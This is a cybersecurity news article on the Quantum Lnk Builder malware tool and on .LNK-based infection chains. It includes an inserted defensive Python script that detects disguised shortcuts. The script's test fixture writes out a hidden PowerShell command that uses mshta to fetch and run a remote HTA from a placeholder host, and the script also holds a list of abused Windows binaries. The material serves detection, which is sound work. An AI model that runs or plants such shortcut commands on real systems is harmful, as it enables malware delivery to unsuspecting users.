The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
new 'quantum' builder lets attackers easily create malicious windows shortcuts

New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts

June 24, 2022

A new malware builder that allows cybercriminals to create malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums.

Dubbed Quantum Lnk Builder, the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support for UAC and Windows SmartScreen bypass as well as “multiple payloads per .LNK” file. Also available are capabilities to create .HTA and disk image (.ISO) payloads.

Quantum Builder is available for rent at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500.


“.LNK files are shortcut files that reference other files, folders, or applications to open them,” Cyble researchers said in a report. “The [threat actor] leverages the .LNK files and drops malicious payloads using LOLBins [living-off-the-land binaries].”

Early evidence of malware samples using Quantum Builder in the wild is said to date back to May 24, masquerading as harmless-looking text files (“test.txt.lnk”).

“By default, Windows hides the .LNK extension, so if a file is named file_name.txt.lnk, then only file_name.txt will be visible to the user even if the show file extension option is enabled,” the researchers said. “For such reasons, this could be an attractive option for TAs, using the .LNK files as a disguise or smokescreen.”

Launching the .LNK file executes PowerShell code that, in turn, runs an HTML Application (“bdg.hta”) file hosted on Quantum’s website (“quantum-software[.]online”) using MSHTA, a legitimate Windows utility that’s used to run HTA files.
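The two points above, the hidden .LNK extension and the LNK-to-PowerShell-to-MSHTA chain, are exactly what a triage script has to see through. The following is an added example and not code from the article or from Cyble: it parses the Shell Link header and StringData fields of a .LNK file per the MS-SHLLINK layout, flags a double extension that Explorer would hide, and flags targets or arguments that invoke LOLBins or a remote URL. The sample shortcut is constructed inline by the helper `build_lnk` (my own, for testing) with a placeholder domain, `example.invalid`; the `LOLBINS` and `DOC_EXTS` lists are my assumptions, and the parser deliberately skips the IDList and LinkInfo blocks, so a real shortcut whose target lives only there will show no `relative_path`.

```python
import re
import struct

# --- Shell Link (MS-SHLLINK) header constants ---
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData blocks appear in this fixed order, each only if its flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]

# Assumed heuristics: binaries commonly abused from shortcuts, and extensions a
# shortcut is dressed up as (the visible part of "file_name.txt.lnk").
LOLBINS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe")
DOC_EXTS = (".txt", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields (target path, arguments, ...)."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDList: 2-byte size, then the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfo: 4-byte size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags}
    for flag, name in STRING_FIELDS:         # each block: CountCharacters, then chars
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields                            # ExtraData blocks after this are ignored


def _exe_name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_shortcut(filename: str, data: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    if filename.lower().endswith(".lnk"):
        shown = filename[:-4]                # Explorer always hides ".lnk"; this is what the user sees
        if shown.lower().endswith(DOC_EXTS):
            findings.append(f"double extension: Explorer displays it as '{shown}'")
    link = parse_lnk(data)
    target = _exe_name(link.get("relative_path", ""))
    if target in LOLBINS:
        findings.append(f"target is a LOLBin: {target}")
    args = link.get("arguments", "").lower()
    for lolbin in LOLBINS:                   # whole-word match so "-command" does not hit "cmd"
        stem = lolbin[:-4]
        if re.search(rf"\b{re.escape(stem)}\b", args):
            findings.append(f"arguments invoke {stem}")
    if "http://" in args or "https://" in args:
        findings.append("arguments reference a remote URL")
    return findings


def build_lnk(relative_path: str, arguments: str = None, with_idlist: bool = False) -> bytes:
    """Construct a minimal Unicode .LNK (test fixture builder, not a real shortcut writer)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    body = b""
    if with_idlist:                          # one dummy ItemID (size 4) followed by the TerminalID
        flags |= HAS_LINK_TARGET_ID_LIST
        idlist = struct.pack("<H", 4) + b"\x1f\x00" + b"\x00\x00"
        body += struct.pack("<H", len(idlist)) + idlist
    strings = [relative_path]
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        strings.append(arguments)
    for s in strings:
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags) + bytes(HEADER_SIZE - 24)
    return header + body


# Constructed sample mirroring the chain in the article (placeholder domain, not a real IoC).
SAMPLE_NAME = "test.txt.lnk"
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       '-WindowStyle Hidden -Command "mshta http://example.invalid/bdg.hta"',
                       with_idlist=True)

if __name__ == "__main__":
    for finding in analyze_shortcut(SAMPLE_NAME, SAMPLE_LNK):
        print("-", finding)
```

Run against a directory of shortcuts (`analyze_shortcut(name, open(path, "rb").read())`), the double-extension finding alone is a strong signal on user-facing shares and mail attachments, since a legitimate shortcut is rarely named to look like a document. Resolving the true target for shortcuts that carry it only in the IDList requires walking the ItemIDs, which this example leaves out.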

Quantum Builder is said to share ties with the North Korea-based Lazarus Group based on source code-level overlaps in the tool and the latter’s modus operandi of leveraging .LNK files for delivering additional-stage payloads, indicating its potential use by APT actors in their attacks.


The development comes as operators behind Bumblebee and Emotet are shifting to .LNK files as a conduit to trigger the infection chains following Microsoft’s decision to disable Visual Basic for Applications (VBA) macros by default across its products earlier this year.

Bumblebee, a replacement for the BazarLoader malware first spotted in March, functions as a backdoor designed to give the attackers persistent access to compromised systems and a downloader for other malware, including Cobalt Strike and Sliver.

The malware’s capabilities have also made it a tool of choice for threat actors, with 413 incidents of Bumblebee infection reported in May 2022, up from 41 in April, according to Cyble.

“Bumblebee is a new and highly sophisticated malware loader that employs extensive evasive maneuvers and anti-analysis tricks, including complex anti-virtualization techniques,” the researchers said. “It is likely to become a popular tool for ransomware groups to deliver their payload.”


Some elements of this posting are sourced from:
thehackernews.com

Copyright © TheCyberSecurity.News, All Rights Reserved.